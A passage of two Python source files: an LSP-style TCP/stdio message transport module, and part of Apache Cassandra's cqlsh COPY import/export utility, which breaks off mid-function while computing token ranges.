|
transports.py | from abc import ABCMeta, abstractmethod
import threading
import time
import socket
from queue import Queue
import subprocess
from .logging import exception_log, debug
try:
from typing import Callable, Dict, Any, Optional
assert Callable and Dict and Any and Optional and subprocess
except ImportError:
pass
ContentLengthHeader = b"Content-Length: "
TCP_CONNECT_TIMEOUT = 5
try:
from typing import Any, Dict, Callable
assert Any and Dict and Callable
except ImportError:
pass
class Transport(object, metaclass=ABCMeta):
    """Abstract interface for a bidirectional, message-based transport."""

    @abstractmethod
    def __init__(self) -> None:
        pass

    @abstractmethod
    def start(self, on_receive: 'Callable[[str], None]', on_closed: 'Callable[[], None]') -> None:
        """Start the transport; `on_receive` is invoked for every incoming
        message, `on_closed` once when the transport shuts down."""
        pass

    @abstractmethod
    def send(self, message: str) -> None:
        """Send one message (implementations may queue it)."""
        pass
# Parser states for the "Content-Length"-framed byte stream (see
# TCPTransport.read_socket).
STATE_HEADERS = 0  # reading header lines, up to the blank separator line
STATE_CONTENT = 1  # reading a body of `content_length` bytes
def start_tcp_transport(port: int, host: 'Optional[str]'=None) -> 'Transport':
    """
    Repeatedly try to connect to ``host:port`` (default "localhost") until
    it succeeds or ``TCP_CONNECT_TIMEOUT`` seconds have elapsed.

    :param port: TCP port to connect to.
    :param host: Host name; defaults to "localhost" when None.
    :returns: A started-up `TCPTransport` wrapping the connected socket.
    :raises Exception: when no connection could be made within the timeout.
    """
    start_time = time.time()
    debug('connecting to {}:{}'.format(host or "localhost", port))
    while time.time() - start_time < TCP_CONNECT_TIMEOUT:
        try:
            sock = socket.create_connection((host or "localhost", port))
            return TCPTransport(sock)
        except ConnectionRefusedError:
            # Server not listening yet. Back off briefly instead of
            # busy-spinning on connect attempts for the whole timeout.
            time.sleep(0.05)
    raise Exception("Timeout connecting to socket")
class TCPTransport(Transport):
    """Transport over an already-connected TCP socket, speaking the
    "Content-Length"-framed protocol. Reading and writing each run on their
    own background thread."""

    def __init__(self, socket: 'Any') -> None:
        self.socket = socket  # type: 'Optional[Any]'
        # Outgoing messages; a `None` entry is the stop sentinel for the
        # writer thread.
        self.send_queue = Queue()  # type: Queue[Optional[str]]

    def start(self, on_receive: 'Callable[[str], None]', on_closed: 'Callable[[], None]') -> None:
        """Store the callbacks and spawn the reader/writer threads."""
        self.on_receive = on_receive
        self.on_closed = on_closed
        self.read_thread = threading.Thread(target=self.read_socket)
        self.read_thread.start()
        self.write_thread = threading.Thread(target=self.write_socket)
        self.write_thread.start()

    def close(self) -> None:
        """Stop both threads and notify the owner via `on_closed`."""
        self.send_queue.put(None)  # kill the write thread as it's blocked on send_queue
        self.socket = None  # both thread loops exit once this is None
        self.on_closed()

    def read_socket(self) -> None:
        """Reader thread: parse framed messages off the socket and dispatch
        each decoded body through `on_receive`."""
        remaining_data = b""
        is_incomplete = False  # True while more bytes are needed for the current frame
        read_state = STATE_HEADERS
        content_length = 0
        while self.socket:
            is_incomplete = False
            try:
                received_data = self.socket.recv(4096)
            except Exception as err:
                exception_log("Failure reading from socket", err)
                self.close()
                break
            if not received_data:
                # recv() returning b"" means the peer closed the connection.
                debug("no data received, closing")
                self.close()
                break
            data = remaining_data + received_data
            remaining_data = b""
            while len(data) > 0 and not is_incomplete:
                if read_state == STATE_HEADERS:
                    headers, _sep, rest = data.partition(b"\r\n\r\n")
                    if len(_sep) < 1:
                        # Header block not complete yet; keep what we have.
                        is_incomplete = True
                        remaining_data = data
                    else:
                        for header in headers.split(b"\r\n"):
                            if header.startswith(ContentLengthHeader):
                                header_value = header[len(ContentLengthHeader):]
                                content_length = int(header_value)
                                read_state = STATE_CONTENT
                        data = rest
                if read_state == STATE_CONTENT:
                    # read content bytes
                    if len(data) >= content_length:
                        content = data[:content_length]
                        self.on_receive(content.decode("UTF-8"))
                        data = data[content_length:]
                        read_state = STATE_HEADERS
                    else:
                        # Body not fully received yet; keep what we have.
                        is_incomplete = True
                        remaining_data = data

    def send(self, message: str) -> None:
        """Queue `message` for the writer thread (thread-safe)."""
        self.send_queue.put(message)

    def write_socket(self) -> None:
        """Writer thread: drain the queue onto the socket until the `None`
        sentinel arrives or the socket is gone."""
        while self.socket:
            message = self.send_queue.get()
            if message is None:
                break
            else:
                try:
                    self.socket.sendall(bytes(message, 'UTF-8'))
                except Exception as err:
                    exception_log("Failure writing to socket", err)
                    self.close()
class StdioTransport(Transport):
    """
    Transport over a subprocess's stdin/stdout pipes, speaking the
    "Content-Length"-framed protocol.

    Reading and writing each run on their own background thread; `close`
    (or a pipe failure) stops both and fires `on_closed`.
    """

    def __init__(self, process: 'subprocess.Popen') -> None:
        self.process = process  # type: Optional[subprocess.Popen]
        # Outgoing messages; a `None` entry is the stop sentinel for the
        # writer thread.
        self.send_queue = Queue()  # type: Queue[Optional[str]]

    def start(self, on_receive: 'Callable[[str], None]', on_closed: 'Callable[[], None]') -> None:
        """Store the callbacks and spawn the reader/writer threads."""
        self.on_receive = on_receive
        self.on_closed = on_closed
        self.write_thread = threading.Thread(target=self.write_stdin)
        self.write_thread.start()
        self.read_thread = threading.Thread(target=self.read_stdout)
        self.read_thread.start()

    def close(self) -> None:
        """Stop both threads and notify the owner via `on_closed`."""
        self.process = None  # both thread loops exit once this is None
        self.send_queue.put(None)  # kill the write thread as it's blocked on send_queue
        self.read_thread = None  # type: ignore  # (left as-is; threads are not joined)

    def read_stdout(self) -> None:
        """
        Reader thread: parse framed JSON responses from the process's stdout
        and dispatch each payload to `on_receive`.
        """
        # Uses the module-level ContentLengthHeader constant (the previous
        # local re-definition shadowed it with the same value).
        running = True
        while running and self.process:
            running = self.process.poll() is None
            try:
                content_length = 0
                while self.process:
                    header = self.process.stdout.readline()
                    if header:
                        header = header.strip()
                    if not header:
                        # Blank line ends the header block (or EOF).
                        break
                    if header.startswith(ContentLengthHeader):
                        content_length = int(header[len(ContentLengthHeader):])
                if content_length > 0:
                    content = self.process.stdout.read(content_length)
                    self.on_receive(content.decode("UTF-8"))
            except IOError as err:
                self.close()
                exception_log("Failure reading stdout", err)
                break
        debug("LSP stdout process ended.")

    def send(self, message: str) -> None:
        """Queue `message` for the writer thread (thread-safe)."""
        self.send_queue.put(message)

    def write_stdin(self) -> None:
        """Writer thread: drain the queue into the process's stdin until the
        `None` sentinel arrives or the process is gone."""
        while self.process:
            message = self.send_queue.get()
            if message is None:
                break  # close() enqueued the sentinel; stop writing.
            else:
                try:
                    self.process.stdin.write(bytes(message, 'UTF-8'))
                    self.process.stdin.flush()
                except (BrokenPipeError, OSError) as err:
                    # Fixed: the message previously said "stdout" although
                    # this writer targets the process's stdin.
                    exception_log("Failure writing to stdin", err)
                    self.close()
|
copyutil.py | # cython: profile=True
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ConfigParser
import csv
import datetime
import json
import glob
import multiprocessing as mp
import os
import platform
import random
import re
import struct
import sys
import threading
import time
import traceback
from bisect import bisect_right
from calendar import timegm
from collections import defaultdict, namedtuple
from decimal import Decimal
from Queue import Queue
from random import randint
from StringIO import StringIO
from select import select
from uuid import UUID
from util import profile_on, profile_off
from cassandra import OperationTimedOut
from cassandra.cluster import Cluster, DefaultConnection
from cassandra.cqltypes import ReversedType, UserType
from cassandra.metadata import protect_name, protect_names, protect_value
from cassandra.policies import RetryPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy, FallthroughRetryPolicy
from cassandra.query import BatchStatement, BatchType, SimpleStatement, tuple_factory
from cassandra.util import Date, Time
from cql3handling import CqlRuleSet
from displaying import NO_COLOR_MAP
from formatting import format_value_default, CqlType, DateTimeFormat, EMPTY, get_formatter
from sslhandling import ssl_settings
PROFILE_ON = False  # enable profiling of worker processes (see util.profile_on/profile_off)
STRACE_ON = False  # attach strace to child processes, see CopyTask.trace_process
DEBUG = False  # This may be set to True when initializing the task

# recv_select (select() on pipes) is only used on Linux; Windows needs special
# handling for pickling worker parameters, see CopyTask.make_params
IS_LINUX = platform.system() == 'Linux'
IS_WINDOWS = platform.system() == 'Windows'

# copy: the COPY option dict, dialect: the csv dialect options,
# unrecognized: whatever options were left over after parsing
CopyOptions = namedtuple('CopyOptions', 'copy dialect unrecognized')
def safe_normpath(fname):
    """
    :return the normalized path with user variables such as ~ expanded, but only
    when there is a file name: a falsy value (meaning no file name) is returned
    unchanged so that '' is not converted into '.'.
    """
    if not fname:
        return fname
    return os.path.normpath(os.path.expanduser(fname))
def printdebugmsg(msg):
    """Print *msg* only when the module-level DEBUG flag is set (cqlsh --debug)."""
    if DEBUG:
        printmsg(msg)
def printmsg(msg, eol='\n', encoding='utf8'):
    """Write *msg* to stdout encoded with *encoding*, append *eol* and flush."""
    sys.stdout.write(msg.encode(encoding))
    sys.stdout.write(eol)
    sys.stdout.flush()
# Keep arguments in sync with printmsg
def swallowmsg(msg, eol='', encoding=''):
    """Discard *msg*: no-op stand-in for printmsg when output is suppressed
    (used by CopyTask when exporting to STDOUT without --debug)."""
    # The original body was the bare expression `None`, which reads like a
    # mistake; `pass` (with a docstring) is the idiomatic no-op.
    pass
class OneWayPipe(object):
    """
    A unidirectional multiprocessing pipe whose two ends are each guarded by a
    process-level lock: one lock serializes writers, the other readers.
    """
    def __init__(self):
        self.reader, self.writer = mp.Pipe(duplex=False)
        self.rlock = mp.Lock()
        self.wlock = mp.Lock()

    def send(self, obj):
        """Send *obj* down the pipe while holding the write lock."""
        with self.wlock:
            self.writer.send(obj)

    def recv(self):
        """Return the next object from the pipe while holding the read lock."""
        with self.rlock:
            return self.reader.recv()

    def close(self):
        """Close both ends of the pipe."""
        self.reader.close()
        self.writer.close()
class ReceivingChannel(object):
    """
    The receiving half of a channel: a thin wrapper exposing only the
    read side of a pipe.
    """
    def __init__(self, pipe):
        self.pipe = pipe

    def recv(self):
        """Block until one object is available on the pipe and return it."""
        return self.pipe.recv()

    def close(self):
        """Close the underlying pipe."""
        self.pipe.close()
class SendingChannel(object):
    """
    The sending half of a channel: wraps a pipe and drains an internal queue
    on a daemon thread, so that send() never blocks the caller.
    """
    def __init__(self, pipe):
        self.pipe = pipe
        self.pending_messages = Queue()

        def feed():
            # Forward queued messages to the pipe forever; report errors
            # but keep the feeding thread alive.
            while True:
                try:
                    msg = self.pending_messages.get()
                    self.pipe.send(msg)
                except Exception as e:
                    printmsg('%s: %s' % (e.__class__.__name__, e.message))

        feeding_thread = threading.Thread(target=feed)
        feeding_thread.setDaemon(True)
        feeding_thread.start()

    def send(self, obj):
        """Enqueue *obj* for asynchronous delivery by the feeding thread."""
        self.pending_messages.put(obj)

    def num_pending(self):
        """Return how many messages have not yet been handed to the pipe."""
        return self.pending_messages.qsize() if self.pending_messages else 0

    def close(self):
        """Close the underlying pipe."""
        self.pipe.close()
class SendingChannels(object):
    """
    A bundle of one-way sending channels, one per worker process.
    """
    def __init__(self, num_channels):
        self.pipes = [OneWayPipe() for _ in xrange(num_channels)]
        self.channels = [SendingChannel(p) for p in self.pipes]
        self.num_channels = num_channels

    def close(self):
        """Close every channel, ignoring per-channel failures."""
        for ch in self.channels:
            try:
                ch.close()
            except:
                pass
class ReceivingChannels(object):
    """
    A group of one way channels for receiving messages.
    """
    def __init__(self, num_channels):
        self.pipes = [OneWayPipe() for _ in xrange(num_channels)]
        self.channels = [ReceivingChannel(p) for p in self.pipes]
        # Cached views of the pipes' read ends and read locks, used by the two
        # recv implementations below.
        self._readers = [p.reader for p in self.pipes]
        self._rlocks = [p.rlock for p in self.pipes]
        self._rlocks_by_readers = dict([(p.reader, p.rlock) for p in self.pipes])
        self.num_channels = num_channels
        # select() on pipes is only used on Linux; elsewhere fall back to polling.
        self.recv = self.recv_select if IS_LINUX else self.recv_polling

    def recv_select(self, timeout):
        """
        Implementation of the recv method for Linux, where select is available. Receive an object from
        all pipes that are ready for reading without blocking.
        """
        readable, _, _ = select(self._readers, [], [], timeout)
        for r in readable:
            with self._rlocks_by_readers[r]:
                try:
                    yield r.recv()
                except EOFError:
                    # the other end of this pipe was closed; skip it
                    continue

    def recv_polling(self, timeout):
        """
        Implementation of the recv method for platforms where select() is not available for pipes.
        We poll on all of the readers with a very small timeout. We stop when the timeout specified
        has been received but we may exceed it since we check all processes during each sweep.
        """
        start = time.time()
        while True:
            for i, r in enumerate(self._readers):
                with self._rlocks[i]:
                    if r.poll(0.000000001):
                        try:
                            yield r.recv()
                        except EOFError:
                            continue
            # the deadline is only checked after a full sweep, so the effective
            # timeout may exceed the requested one
            if time.time() - start > timeout:
                break

    def close(self):
        """Close every channel, swallowing any per-channel errors."""
        for ch in self.channels:
            try:
                ch.close()
            except:
                pass
class CopyTask(object):
    """
    A base class for ImportTask and ExportTask
    """
    def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, direction):
        """
        :param shell: the cqlsh shell that launched the COPY command
        :param ks: the keyspace name
        :param table: the table name
        :param columns: the columns to copy, or a falsy value for all columns
        :param fname: the file to read/write, or None for STDIN/STDOUT
        :param opts: the raw COPY options from the command line
        :param protocol_version: the native protocol version in use
        :param config_file: the path of the cqlshrc configuration file
        :param direction: 'from' for COPY FROM (import), 'to' for COPY TO (export)
        """
        self.shell = shell
        self.ks = ks
        self.table = table
        self.table_meta = self.shell.get_table_meta(self.ks, self.table)
        self.host = shell.conn.get_control_connection_host()
        self.fname = safe_normpath(fname)
        self.protocol_version = protocol_version
        self.config_file = config_file

        # if cqlsh is invoked with --debug then set the global debug flag to True
        if shell.debug:
            global DEBUG
            DEBUG = True

        # do not display messages when exporting to STDOUT unless --debug is set
        self.printmsg = printmsg if self.fname is not None or direction == 'from' or DEBUG \
            else swallowmsg
        self.options = self.parse_options(opts, direction)

        self.num_processes = self.options.copy['numprocesses']
        self.encoding = self.options.copy['encoding']
        self.printmsg('Using %d child processes' % (self.num_processes,))

        if direction == 'from':
            self.num_processes += 1  # add the feeder process

        self.processes = []
        # inmsg/outmsg are named from the parent's point of view: one receiving
        # and one sending channel per child process.
        self.inmsg = ReceivingChannels(self.num_processes)
        self.outmsg = SendingChannels(self.num_processes)

        self.columns = CopyTask.get_columns(shell, ks, table, columns)
        self.time_start = time.time()

    def maybe_read_config_file(self, opts, direction):
        """
        Read optional sections from a configuration file that was specified in the command options or from the default
        cqlshrc configuration file if none was specified.
        """
        config_file = opts.pop('configfile', '')
        if not config_file:
            config_file = self.config_file

        if not os.path.isfile(config_file):
            return opts

        configs = ConfigParser.RawConfigParser()
        configs.readfp(open(config_file))

        ret = dict()
        # later sections are more specific and therefore override earlier ones
        config_sections = list(['copy', 'copy-%s' % (direction,),
                                'copy:%s.%s' % (self.ks, self.table),
                                'copy-%s:%s.%s' % (direction, self.ks, self.table)])

        for section in config_sections:
            if configs.has_section(section):
                options = dict(configs.items(section))
                self.printmsg("Reading options from %s:[%s]: %s" % (config_file, section, options))
                ret.update(options)

        # Update this last so the command line options take precedence over the configuration file options
        if opts:
            self.printmsg("Reading options from the command line: %s" % (opts,))
            ret.update(opts)

        if self.shell.debug:  # this is important for testing, do not remove
            self.printmsg("Using options: '%s'" % (ret,))

        return ret

    @staticmethod
    def clean_options(opts):
        """
        Convert all option values to valid string literals unless they are path names
        """
        return dict([(k, v.decode('string_escape') if k not in ['errfile', 'ratefile'] else v)
                     for k, v, in opts.iteritems()])

    def parse_options(self, opts, direction):
        """
        Parse options for import (COPY FROM) and export (COPY TO) operations.
        Extract from opts csv and dialect options.

        :return: 3 dictionaries: the csv options, the dialect options, any unrecognized options.
        """
        shell = self.shell
        opts = self.clean_options(self.maybe_read_config_file(opts, direction))

        dialect_options = dict()
        dialect_options['quotechar'] = opts.pop('quote', '"')
        dialect_options['escapechar'] = opts.pop('escape', '\\')
        dialect_options['delimiter'] = opts.pop('delimiter', ',')
        # csv forbids quotechar == escapechar; fold into doublequote mode instead
        if dialect_options['quotechar'] == dialect_options['escapechar']:
            dialect_options['doublequote'] = True
            del dialect_options['escapechar']
        else:
            dialect_options['doublequote'] = False

        copy_options = dict()
        copy_options['nullval'] = opts.pop('null', '')
        copy_options['header'] = bool(opts.pop('header', '').lower() == 'true')
        copy_options['encoding'] = opts.pop('encoding', 'utf8')
        copy_options['maxrequests'] = int(opts.pop('maxrequests', 6))
        copy_options['pagesize'] = int(opts.pop('pagesize', 1000))
        # by default the page timeout is 10 seconds per 1000 entries
        # in the page size or 10 seconds if pagesize is smaller
        copy_options['pagetimeout'] = int(opts.pop('pagetimeout', max(10, 10 * (copy_options['pagesize'] / 1000))))
        copy_options['maxattempts'] = int(opts.pop('maxattempts', 5))
        copy_options['dtformats'] = DateTimeFormat(opts.pop('datetimeformat', shell.display_timestamp_format),
                                                   shell.display_date_format, shell.display_nanotime_format,
                                                   milliseconds_only=True)
        copy_options['floatprecision'] = int(opts.pop('floatprecision', '5'))
        copy_options['doubleprecision'] = int(opts.pop('doubleprecision', '12'))
        copy_options['chunksize'] = int(opts.pop('chunksize', 5000))
        copy_options['ingestrate'] = int(opts.pop('ingestrate', 100000))
        copy_options['maxbatchsize'] = int(opts.pop('maxbatchsize', 20))
        copy_options['minbatchsize'] = int(opts.pop('minbatchsize', 10))
        copy_options['reportfrequency'] = float(opts.pop('reportfrequency', 0.25))
        copy_options['consistencylevel'] = shell.consistency_level
        copy_options['decimalsep'] = opts.pop('decimalsep', '.')
        copy_options['thousandssep'] = opts.pop('thousandssep', '')
        copy_options['boolstyle'] = [s.strip() for s in opts.pop('boolstyle', 'True, False').split(',')]
        copy_options['numprocesses'] = int(opts.pop('numprocesses', self.get_num_processes(16)))
        copy_options['begintoken'] = opts.pop('begintoken', '')
        copy_options['endtoken'] = opts.pop('endtoken', '')
        copy_options['maxrows'] = int(opts.pop('maxrows', '-1'))
        copy_options['skiprows'] = int(opts.pop('skiprows', '0'))
        copy_options['skipcols'] = opts.pop('skipcols', '')
        copy_options['maxparseerrors'] = int(opts.pop('maxparseerrors', '-1'))
        copy_options['maxinserterrors'] = int(opts.pop('maxinserterrors', '1000'))
        copy_options['errfile'] = safe_normpath(opts.pop('errfile', 'import_%s_%s.err' % (self.ks, self.table,)))
        copy_options['ratefile'] = safe_normpath(opts.pop('ratefile', ''))
        copy_options['maxoutputsize'] = int(opts.pop('maxoutputsize', '-1'))
        copy_options['preparedstatements'] = bool(opts.pop('preparedstatements', 'true').lower() == 'true')
        copy_options['ttl'] = int(opts.pop('ttl', -1))

        # Hidden properties, they do not appear in the documentation but can be set in config files
        # or on the cmd line but w/o completion
        copy_options['maxinflightmessages'] = int(opts.pop('maxinflightmessages', '512'))
        copy_options['maxbackoffattempts'] = int(opts.pop('maxbackoffattempts', '12'))
        copy_options['maxpendingchunks'] = int(opts.pop('maxpendingchunks', '24'))
        # set requesttimeout to a value high enough so that maxbatchsize rows will never timeout if the server
        # responds: here we set it to 1 sec per 10 rows but no less than 60 seconds
        copy_options['requesttimeout'] = int(opts.pop('requesttimeout', max(60, 1 * copy_options['maxbatchsize'] / 10)))
        # set childtimeout higher than requesttimeout so that child processes have a chance to report request timeouts
        copy_options['childtimeout'] = int(opts.pop('childtimeout', copy_options['requesttimeout'] + 30))

        self.check_options(copy_options)
        # whatever is left in opts was not recognized
        return CopyOptions(copy=copy_options, dialect=dialect_options, unrecognized=opts)

    @staticmethod
    def check_options(copy_options):
        """
        Check any options that require a sanity check beyond a simple type conversion and if required
        raise a value error:

        - boolean styles must be exactly 2, they must be different and they cannot be empty
        """
        bool_styles = copy_options['boolstyle']
        if len(bool_styles) != 2 or bool_styles[0] == bool_styles[1] or not bool_styles[0] or not bool_styles[1]:
            raise ValueError("Invalid boolean styles %s" % copy_options['boolstyle'])

    @staticmethod
    def get_num_processes(cap):
        """
        Pick a reasonable number of child processes. We need to leave at
        least one core for the parent or feeder process.
        """
        return max(1, min(cap, CopyTask.get_num_cores() - 1))

    @staticmethod
    def get_num_cores():
        """
        Return the number of cores if available. If the test environment variable
        is set, then return the number carried by this variable. This is to test single-core
        machine more easily.
        """
        try:
            num_cores_for_testing = os.environ.get('CQLSH_COPY_TEST_NUM_CORES', '')
            ret = int(num_cores_for_testing) if num_cores_for_testing else mp.cpu_count()
            printdebugmsg("Detected %d core(s)" % (ret,))
            return ret
        except NotImplementedError:
            printdebugmsg("Failed to detect number of cores, returning 1")
            return 1

    @staticmethod
    def describe_interval(seconds):
        """Return a human readable description of *seconds*, e.g. '1 hour, 2 minutes, and 3.000 seconds'."""
        desc = []
        for length, unit in ((86400, 'day'), (3600, 'hour'), (60, 'minute')):
            # Python 2 integer division: whole number of days/hours/minutes
            num = int(seconds) / length
            if num > 0:
                desc.append('%d %s' % (num, unit))
                if num > 1:
                    desc[-1] += 's'
            seconds %= length
        words = '%.03f seconds' % seconds
        if len(desc) > 1:
            words = ', '.join(desc) + ', and ' + words
        elif len(desc) == 1:
            words = desc[0] + ' and ' + words
        return words

    @staticmethod
    def get_columns(shell, ks, table, columns):
        """
        Return all columns if none were specified or only the columns specified.
        Possible enhancement: introduce a regex like syntax (^) to allow users
        to specify all columns except a few.
        """
        return shell.get_column_names(ks, table) if not columns else columns

    def close(self):
        """Terminate the child processes and close all communication channels."""
        self.stop_processes()
        self.inmsg.close()
        self.outmsg.close()

    def num_live_processes(self):
        """Return how many child processes are still alive."""
        return sum(1 for p in self.processes if p.is_alive())

    @staticmethod
    def get_pid():
        return os.getpid() if hasattr(os, 'getpid') else None

    @staticmethod
    def trace_process(pid):
        """Attach strace to *pid* in the background when STRACE_ON is set (debugging aid)."""
        if pid and STRACE_ON:
            os.system("strace -vvvv -c -o strace.{pid}.out -e trace=all -p {pid}&".format(pid=pid))

    def start_processes(self):
        """Start every child process (and optionally strace them and the parent)."""
        for i, process in enumerate(self.processes):
            process.start()
            self.trace_process(process.pid)

        self.trace_process(self.get_pid())

    def stop_processes(self):
        for process in self.processes:
            process.terminate()

    def make_params(self):
        """
        Return a dictionary of parameters to be used by the worker processes.
        On Windows this dictionary must be pickle-able, therefore we do not pass the
        parent connection since it may not be pickle-able. Also, on Windows child
        processes are spawned and not forked, and therefore we don't need to shutdown
        the parent connection anyway, see CASSANDRA-11749 for more details.
        """
        shell = self.shell

        return dict(ks=self.ks,
                    table=self.table,
                    local_dc=self.host.datacenter,
                    columns=self.columns,
                    options=self.options,
                    connect_timeout=shell.conn.connect_timeout,
                    hostname=self.host.address,
                    port=shell.port,
                    ssl=shell.ssl,
                    auth_provider=shell.auth_provider,
                    parent_cluster=shell.conn if not IS_WINDOWS else None,
                    cql_version=shell.conn.cql_version,
                    config_file=self.config_file,
                    protocol_version=self.protocol_version,
                    debug=shell.debug
                    )

    def validate_columns(self):
        """Return False (and print an error) unless every requested column exists in the table."""
        shell = self.shell

        if not self.columns:
            shell.printerr("No column specified")
            return False

        for c in self.columns:
            if c not in self.table_meta.columns:
                shell.printerr('Invalid column name %s' % (c,))
                return False

        return True

    def update_params(self, params, i):
        """
        Add the communication pipes to the parameters to be passed to the worker process:
        inpipe is the message pipe flowing from parent to child process, so outpipe from the parent point
        of view and, vice-versa, outpipe is the message pipe flowing from child to parent, so inpipe
        from the parent point of view, hence the two are swapped below.
        """
        params['inpipe'] = self.outmsg.pipes[i]
        params['outpipe'] = self.inmsg.pipes[i]
        return params
class ExportWriter(object):
    """
    A class that writes to one or more csv files, or STDOUT
    """

    def __init__(self, fname, shell, columns, options):
        """
        :param fname: output file name, or None for STDOUT
        :param shell: the cqlsh shell
        :param columns: the column names (used for the optional csv header)
        :param options: the parsed CopyOptions
        """
        self.fname = fname
        self.shell = shell
        self.columns = columns
        self.options = options
        self.header = options.copy['header']
        self.max_output_size = long(options.copy['maxoutputsize'])
        self.current_dest = None
        self.num_files = 0

        # splitting into multiple files only makes sense for a real file name;
        # with STDOUT the maxoutputsize option is ignored with a warning
        if self.max_output_size > 0:
            if fname is not None:
                self.write = self._write_with_split
                self.num_written = 0
            else:
                shell.printerr("WARNING: maxoutputsize {} ignored when writing to STDOUT".format(self.max_output_size))
                self.write = self._write_without_split
        else:
            self.write = self._write_without_split

    def open(self):
        """Open the first destination and write the csv header if requested.
        Return True on success, False if the destination could not be opened."""
        self.current_dest = self._get_dest(self.fname)
        if self.current_dest is None:
            return False

        if self.header:
            writer = csv.writer(self.current_dest.output, **self.options.dialect)
            writer.writerow(self.columns)

        return True

    def close(self):
        self._close_current_dest()

    def _next_dest(self):
        # move on to the next numbered output file, e.g. fname.1, fname.2, ...
        self._close_current_dest()
        self.current_dest = self._get_dest(self.fname + '.%d' % (self.num_files,))

    def _get_dest(self, source_name):
        """
        Open the output file if any or else use stdout. Return a namedtuple
        containing the out and a boolean indicating if the output should be closed.
        """
        CsvDest = namedtuple('CsvDest', 'output close')

        if self.fname is None:
            return CsvDest(output=sys.stdout, close=False)
        else:
            try:
                ret = CsvDest(output=open(source_name, 'wb'), close=True)
                self.num_files += 1
                return ret
            except IOError, e:
                self.shell.printerr("Can't open %r for writing: %s" % (source_name, e))
                return None

    def _close_current_dest(self):
        if self.current_dest and self.current_dest.close:
            self.current_dest.output.close()
            self.current_dest = None

    def _write_without_split(self, data, _):
        """
        Write the data to the current destination output.
        """
        self.current_dest.output.write(data)

    def _write_with_split(self, data, num):
        """
        Write the data to the current destination output if we still
        haven't reached the maximum number of rows. Otherwise split
        the rows between the current destination and the next.
        """
        if (self.num_written + num) > self.max_output_size:
            num_remaining = self.max_output_size - self.num_written
            last_switch = 0
            for i, row in enumerate(filter(None, data.split(os.linesep))):
                if i == num_remaining:
                    self._next_dest()
                    last_switch = i
                    # allow for further splits within the same chunk
                    num_remaining += self.max_output_size
                self.current_dest.output.write(row + '\n')

            self.num_written = num - last_switch
        else:
            self.num_written += num
            self.current_dest.output.write(data)
class ExportTask(CopyTask):
    """
    A class that exports data to .csv by instantiating one or more processes that work in parallel (ExportProcess).
    """
    def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
        CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'to')

        options = self.options
        self.begin_token = long(options.copy['begintoken']) if options.copy['begintoken'] else None
        self.end_token = long(options.copy['endtoken']) if options.copy['endtoken'] else None
        self.writer = ExportWriter(fname, shell, columns, options)

    def run(self):
        """
        Initiates the export by starting the worker processes.
        Then hand over control to export_records.
        """
        shell = self.shell

        if self.options.unrecognized:
            shell.printerr('Unrecognized COPY TO options: %s' % ', '.join(self.options.unrecognized.keys()))
            return

        if not self.validate_columns():
            return 0

        ranges = self.get_ranges()
        if not ranges:
            return 0

        if not self.writer.open():
            return 0

        columns = u"[" + u", ".join(self.columns) + u"]"
        self.printmsg(u"\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)

        params = self.make_params()
        for i in xrange(self.num_processes):
            self.processes.append(ExportProcess(self.update_params(params, i)))

        self.start_processes()

        try:
            self.export_records(ranges)
        finally:
            self.close()

    def close(self):
        CopyTask.close(self)
        self.writer.close()

    def get_ranges(self):
        """
        return a queue of tuples, where the first tuple entry is a token range (from, to]
        and the second entry is a list of hosts that own that range. Each host is responsible
        for all the tokens in the range (from, to].

        The ring information comes from the driver metadata token map, which is built by
        querying System.PEERS.

        We only consider replicas that are in the local datacenter. If there are no local replicas
        we use the cqlsh session host.
        """
        shell = self.shell
        hostname = self.host.address
        local_dc = self.host.datacenter
        ranges = dict()
        min_token = self.get_min_token()
        begin_token = self.begin_token
        end_token = self.end_token

        def make_range(prev, curr):
            """
            Return the intersection of (prev, curr) and (begin_token, end_token),
            return None if the intersection is empty
            """
            ret = (prev, curr)
            if begin_token:
                if ret[1] < begin_token:
                    return None
                elif ret[0] < begin_token:
                    ret = (begin_token, ret[1])

            if end_token:
                if ret[0] > end_token:
                    return None
                elif ret[1] > end_token:
                    ret = (ret[0], end_token)

            return ret

        def make_range_data(replicas=None):
            # the bookkeeping record attached to each token range: candidate
            # hosts, number of attempts so far, rows received, assigned worker
            hosts = []
            if replicas:
                for r in replicas:
                    if r.is_up is not False and r.datacenter == local_dc:
                        hosts.append(r.address)
            if not hosts:
                hosts.append(hostname)  # fallback to default host if no replicas in current dc
            return {'hosts': tuple(hosts), 'attempts': 0, 'rows': 0, 'workerno': -1}

        if begin_token and begin_token < min_token:
            shell.printerr('Begin token %d must be bigger or equal to min token %d' % (begin_token, min_token))
            return ranges

        if begin_token and end_token and begin_token > end_token:
            shell.printerr('Begin token %d must be smaller than end token %d' % (begin_token, end_token))
            return ranges

        if shell.conn.metadata.token_map is None or min_token is None:
            # token information is unavailable: query everything in one range
            ranges[(begin_token, end_token)] = make_range_data()
            return ranges

        ring = shell.get_ring(self.ks).items()
        ring.sort()

        if not ring:
            #  If the ring is empty we get the entire ring from the host we are currently connected to
            ranges[(begin_token, end_token)] = make_range_data()
        elif len(ring) == 1:
            #  If there is only one token we get the entire ring from the replicas for that token
            ranges[(begin_token, end_token)] = make_range_data(ring[0][1])
        else:
            # else we loop on the ring
            first_range_data = None
            previous = None
            for token, replicas in ring:
                if not first_range_data:
                    first_range_data = make_range_data(replicas)  # we use it at the end when wrapping around

                if token.value == min_token:
                    continue  # avoids looping entire ring

                current_range = make_range(previous, token.value)
                if not current_range:
                    continue

                ranges[current_range] = make_range_data(replicas)
                previous = token.value

            #  For the last ring interval we query the same replicas that hold the first token in the ring
            if previous is not None and (not end_token or previous < end_token):
                ranges[(previous, end_token)] = first_range_data

        if not ranges:
